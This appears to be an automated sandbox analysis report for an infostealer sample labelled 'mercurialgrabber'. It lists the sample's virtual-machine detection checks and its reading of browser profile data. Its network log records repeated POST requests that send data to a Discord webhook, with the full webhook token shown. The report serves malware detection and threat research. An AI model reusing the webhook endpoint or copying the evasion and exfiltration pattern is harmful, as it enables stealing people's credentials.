mercurialgrabber | 68f01e0d0f2bf1705c62ad8b94d4454d2646aced975b56e593c59a58e4b0ccca

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions	136ce1f5f2299e4f8e3fb5e30dc0f149.exe

Looks for VMWare Tools registry key 2 TTPs 1 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools	136ce1f5f2299e4f8e3fb5e30dc0f149.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	136ce1f5f2299e4f8e3fb5e30dc0f149.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
6	discord.com
9	discord.com
22	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip4.seeip.org
2	ip4.seeip.org
3	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	136ce1f5f2299e4f8e3fb5e30dc0f149.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	136ce1f5f2299e4f8e3fb5e30dc0f149.exe

Checks SCSI registry key(s) 3 TTPs 1 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S	136ce1f5f2299e4f8e3fb5e30dc0f149.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	136ce1f5f2299e4f8e3fb5e30dc0f149.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	136ce1f5f2299e4f8e3fb5e30dc0f149.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0	136ce1f5f2299e4f8e3fb5e30dc0f149.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation	136ce1f5f2299e4f8e3fb5e30dc0f149.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer	136ce1f5f2299e4f8e3fb5e30dc0f149.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName	136ce1f5f2299e4f8e3fb5e30dc0f149.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1568	136ce1f5f2299e4f8e3fb5e30dc0f149.exe

C:\Users\Admin\AppData\Local\Temp\136ce1f5f2299e4f8e3fb5e30dc0f149.exe
"C:\Users\Admin\AppData\Local\Temp\136ce1f5f2299e4f8e3fb5e30dc0f149.exe"
1⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1568

Network

DNS

ip4.seeip.org

136ce1f5f2299e4f8e3fb5e30dc0f149.exe

Remote address:

8.8.8.8:53

Request

ip4.seeip.org

IN A

Response

ip4.seeip.org

IN A

23.128.64.141
GET

https://ip4.seeip.org/

136ce1f5f2299e4f8e3fb5e30dc0f149.exe

Remote address:

23.128.64.141:443

Request

GET / HTTP/1.1
Host: ip4.seeip.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 07 Jul 2024 07:31:56 GMT
Content-Type: text/plain
Content-Length: 13
Connection: keep-alive
strict-transport-security: max-age=31536000; includeSubDomains
DNS

ip-api.com

136ce1f5f2299e4f8e3fb5e30dc0f149.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com//json/194.110.13.70

136ce1f5f2299e4f8e3fb5e30dc0f149.exe

Remote address:

208.95.112.1:80

Request

GET //json/194.110.13.70 HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 07 Jul 2024 07:31:56 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 311
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

discord.com

136ce1f5f2299e4f8e3fb5e30dc0f149.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.135.232

discord.com

IN A

162.159.136.232
POST

https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT

136ce1f5f2299e4f8e3fb5e30dc0f149.exe

Remote address:

162.159.138.232:443

Request

POST /api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT HTTP/1.1
Content-Type: application/json
Host: discord.com
Content-Length: 459
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Sun, 07 Jul 2024 07:31:57 GMT
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
set-cookie: __dcfduid=fdb145ec3c3211ef87398ea91c0139ed; Expires=Fri, 06-Jul-2029 07:31:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1720337518
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1sh8viXJgqIIKPmzHbxMLDaa79BUrlNvZcjjLQAqNiROlKvMaI5hVc7e9cZP2T%2FcNHUc2JRj1fG9L0Auh5oFEZVMnccx10vM2I8Lu%2BSv%2FVJcGKMoDzOBHTn94F1n"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=fdb145ec3c3211ef87398ea91c0139ed07dbd8c96e550e95f9e598124f5a4f6ba8e3f323306f29b37b1eaaf37ad172ab; Expires=Fri, 06-Jul-2029 07:31:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=bec44f1fd52a35b57f301cd2a7cfeac7c77dd5a8-1720337517; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=TloOL9S2pRr_OHc4YTF9sDBqG6FWAq1u08UO3v6iExI-1720337517450-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 89f6234aeab560ff-LHR
POST

https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT

136ce1f5f2299e4f8e3fb5e30dc0f149.exe

Remote address:

162.159.138.232:443

Request

POST /api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT HTTP/1.1
Content-Type: application/json
Host: discord.com
Content-Length: 315
Expect: 100-continue

Response

HTTP/1.1 404 Not Found

Date: Sun, 07 Jul 2024 07:31:57 GMT
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
set-cookie: __dcfduid=fdf597ec3c3211efb48f8ea91c0139ed; Expires=Fri, 06-Jul-2029 07:31:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1720337519
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bpjRTVO%2BseRTAzkvfRJnrYUVb7zk%2FT4aoq4KXIDaqtWLIbN1p%2F%2FWNgeNXqZLTHXMnRvOr6f9%2BxkwzRazFdDVIGdLpN7bQPggKB12uci8hW3EUCvrIYLjaeTQhmjF"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=fdf597ec3c3211efb48f8ea91c0139edb813a13b9301f752c1db3795edc39a08057a75fd8f467799978d0d0b0fa59aa9; Expires=Fri, 06-Jul-2029 07:31:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=bec44f1fd52a35b57f301cd2a7cfeac7c77dd5a8-1720337517; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=hUAw.7luqzHo58ctpS9BxNKkipakrqi.kd9.aj367tw-1720337517901-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 89f6234ddcab60ff-LHR
POST

https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT

136ce1f5f2299e4f8e3fb5e30dc0f149.exe

Remote address:

162.159.138.232:443

Request

POST /api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT HTTP/1.1
Content-Type: application/json
Host: discord.com
Content-Length: 748
Expect: 100-continue

Response

HTTP/1.1 404 Not Found

Date: Sun, 07 Jul 2024 07:32:01 GMT
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
set-cookie: __dcfduid=00208ce83c3311ef9adb2a27ef84ee9d; Expires=Fri, 06-Jul-2029 07:32:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1720337522
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S3%2Bqa2ButKFc67qyIkywvchZ2O8bzhRByUbbFQIn5pjLnd0U6nyy%2F4URt%2Bz1IHO7UaDywSzvt3v6qeSQGVWFvM24zXc3jl3ET%2B5s0KFS8760gYk6wuWQEaBhcFT%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=00208ce83c3311ef9adb2a27ef84ee9d5dde2742735d26d4381464753046b35825a425d7158d455a486e96d08b5d851d; Expires=Fri, 06-Jul-2029 07:32:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=ca908868656234f981e70360b3731692c8d5203e-1720337521; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=ps7snWigL3fI9ljf30sA2sUnK9FzoXhNUnOl4VytG1o-1720337521535-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 89f623645d4360ff-LHR
POST

https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT

136ce1f5f2299e4f8e3fb5e30dc0f149.exe

Remote address:

162.159.138.232:443

Request

POST /api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT HTTP/1.1
Content-Type: multipart/form-data; boundary=----------56f099c39d3141f69b3461d39fd97316
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0
Host: discord.com
Content-Length: 662
Expect: 100-continue

Response

HTTP/1.1 404 Not Found

Date: Sun, 07 Jul 2024 07:32:02 GMT
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
set-cookie: __dcfduid=00b062963c3311ef942c6a5a2543f6ba; Expires=Fri, 06-Jul-2029 07:32:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1720337523
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WMf5vu3umOSkvMqTHmeO1Imtmqot7UnDWiGemr5yqtAlCC3ySsbMNiO%2BaeHf70VyK2hnkjs2yLrdOQOXBvQfx%2BcuEAXdu3CJq2sbagt40c03ndujzpWyIHCploGR"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=00b062963c3311ef942c6a5a2543f6ba532cbdb07052b003f36d6901807406d56f3bfd9ac1cc60223887fe3556173388; Expires=Fri, 06-Jul-2029 07:32:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=6fa66d8b617a7210f2a278c82b93316bd406df15-1720337522; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=Msx2l0k45pMLECFVFM8RaVaxbHfsg1o9cj1A5no7jUM-1720337522484-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 89f6236a79f260ff-LHR
DNS

141.64.128.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

141.64.128.23.in-addr.arpa

IN PTR

Response
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

232.138.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.138.159.162.in-addr.arpa

IN PTR

Response
DNS

81.144.22.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

81.144.22.2.in-addr.arpa

IN PTR

Response

81.144.22.2.in-addr.arpa

IN PTR

a2-22-144-81deploystaticakamaitechnologiescom
DNS

205.47.74.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

205.47.74.20.in-addr.arpa

IN PTR

Response
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.dual-a-0034.a-msedge.net

g-bing-com.dual-a-0034.a-msedge.net

IN CNAME

dual-a-0034.a-msedge.net

dual-a-0034.a-msedge.net

IN A

204.79.197.237

dual-a-0034.a-msedge.net

IN A

13.107.21.237
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid=

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=3586313705F463281A822582044F6248; domain=.bing.com; expires=Fri, 01-Aug-2025 07:32:01 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 0B21876FE1F9457CA683D6E900AF6750 Ref B: LON04EDGE0810 Ref C: 2024-07-07T07:32:01Z
date: Sun, 07 Jul 2024 07:32:01 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid=

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=3586313705F463281A822582044F6248

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=mY3UuG_nBc2OL1LAU47YyOvFSXHXmvfukO17eZtHG00; domain=.bing.com; expires=Fri, 01-Aug-2025 07:32:01 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8B9EA31163D24AEE81692B920C4462D6 Ref B: LON04EDGE0810 Ref C: 2024-07-07T07:32:01Z
date: Sun, 07 Jul 2024 07:32:01 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid=

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=3586313705F463281A822582044F6248; MSPTC=mY3UuG_nBc2OL1LAU47YyOvFSXHXmvfukO17eZtHG00

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 19EFCFA2A04B4663B0D9F7E746A50AFF Ref B: LON04EDGE0810 Ref C: 2024-07-07T07:32:01Z
date: Sun, 07 Jul 2024 07:32:01 GMT
POST

https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT

136ce1f5f2299e4f8e3fb5e30dc0f149.exe

Remote address:

162.159.138.232:443

Request

POST /api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: discord.com
Content-Length: 196
Expect: 100-continue

Response

HTTP/1.1 404 Not Found

Date: Sun, 07 Jul 2024 07:32:02 GMT
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
set-cookie: __dcfduid=007a08043c3311ef8645c28e99b9b89b; Expires=Fri, 06-Jul-2029 07:32:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1720337523
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9UVmPNienKgh81S7s50iSaGCj45K4y4sKqzfSw3Tz7J8dOkovtzbsCE4OV4ZBqA7XQMFraNwe5y%2BcCRTZH8A%2F3iT%2BP9mac58nx60iFJAhOjGj%2BBh4pUvmbV3QSHH"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=007a08043c3311ef8645c28e99b9b89b25de1689bcbe1545e02af90d7e517a665a3f773565b81de0374da1198cc42d95; Expires=Fri, 06-Jul-2029 07:32:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=f96b104d3923dee429ed3f1cf50fd3e468e6af7a-1720337522; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=qPMjk76UKKZKdZJm3t9005_enDkkOUwbdG8ufjQQqcM-1720337522121-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 89f62367cada71e4-LHR
DNS

237.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

237.197.79.204.in-addr.arpa

IN PTR

Response
DNS

26.165.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.165.165.52.in-addr.arpa

IN PTR

Response
DNS

198.187.3.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.187.3.20.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

73.144.22.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.144.22.2.in-addr.arpa

IN PTR

Response

73.144.22.2.in-addr.arpa

IN PTR

a2-22-144-73deploystaticakamaitechnologiescom
DNS

13.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.227.111.52.in-addr.arpa

IN PTR

Response

23.128.64.141:443

https://ip4.seeip.org/

tls, http

136ce1f5f2299e4f8e3fb5e30dc0f149.exe

808 B
3.8kB
10
8

HTTP Request

GET https://ip4.seeip.org/

HTTP Response

200
208.95.112.1:80

http://ip-api.com//json/194.110.13.70

http

136ce1f5f2299e4f8e3fb5e30dc0f149.exe

355 B
620 B
6
3

HTTP Request

GET http://ip-api.com//json/194.110.13.70

HTTP Response

200
162.159.138.232:443

https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT

tls, http

136ce1f5f2299e4f8e3fb5e30dc0f149.exe

4.7kB
10.8kB
22
28

HTTP Request

POST https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT

HTTP Response

404

HTTP Request

POST https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT

HTTP Response

404

HTTP Request

POST https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT

HTTP Response

404

HTTP Request

POST https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT

HTTP Response

404
204.79.197.237:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid=

tls, http2

2.0kB
9.3kB
22
19

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid=

HTTP Response

204
162.159.138.232:443

https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT

tls, http

136ce1f5f2299e4f8e3fb5e30dc0f149.exe

1.3kB
2.2kB
9
9

HTTP Request

POST https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT

HTTP Response

404

8.8.8.8:53

ip4.seeip.org

dns

136ce1f5f2299e4f8e3fb5e30dc0f149.exe

59 B
75 B
1
1

DNS Request

ip4.seeip.org

DNS Response

23.128.64.141
8.8.8.8:53

ip-api.com

dns

136ce1f5f2299e4f8e3fb5e30dc0f149.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

discord.com

dns

136ce1f5f2299e4f8e3fb5e30dc0f149.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.138.232

162.159.137.232

162.159.128.233

162.159.135.232

162.159.136.232
8.8.8.8:53

141.64.128.23.in-addr.arpa

dns

72 B
140 B
1
1

DNS Request

141.64.128.23.in-addr.arpa
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

232.138.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

232.138.159.162.in-addr.arpa
8.8.8.8:53

81.144.22.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

81.144.22.2.in-addr.arpa
8.8.8.8:53

205.47.74.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

205.47.74.20.in-addr.arpa
8.8.8.8:53

g.bing.com

dns

56 B
151 B
1
1

DNS Request

g.bing.com

DNS Response

204.79.197.237

13.107.21.237
8.8.8.8:53

237.197.79.204.in-addr.arpa

dns

73 B
143 B
1
1

DNS Request

237.197.79.204.in-addr.arpa
8.8.8.8:53

26.165.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

26.165.165.52.in-addr.arpa
8.8.8.8:53

198.187.3.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

198.187.3.20.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

73.144.22.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

